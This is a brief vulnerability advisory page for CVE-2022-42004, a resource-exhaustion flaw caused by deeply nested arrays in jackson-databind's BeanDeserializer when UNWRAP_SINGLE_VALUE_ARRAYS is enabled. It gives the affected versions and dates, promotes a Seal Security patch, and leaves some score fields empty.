CVE-2022-42004

Uncontrolled Resource Consumption in FasterXML jackson-databind

Description

In FasterXML jackson-databind before 2.12.7.1 and in 2.13.x before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. This issue can only happen when the UNWRAP_SINGLE_VALUE_ARRAYS feature is explicitly enabled.

Patch Available

Fix available through Seal Security.  
No upgrade required, protect your application instantly.

Fix without upgrading

Score

Severity

Ecosystem

Java

Publish Date

October 2, 2022

Modified Date

December 2, 2024

Score Vector

Affected Versions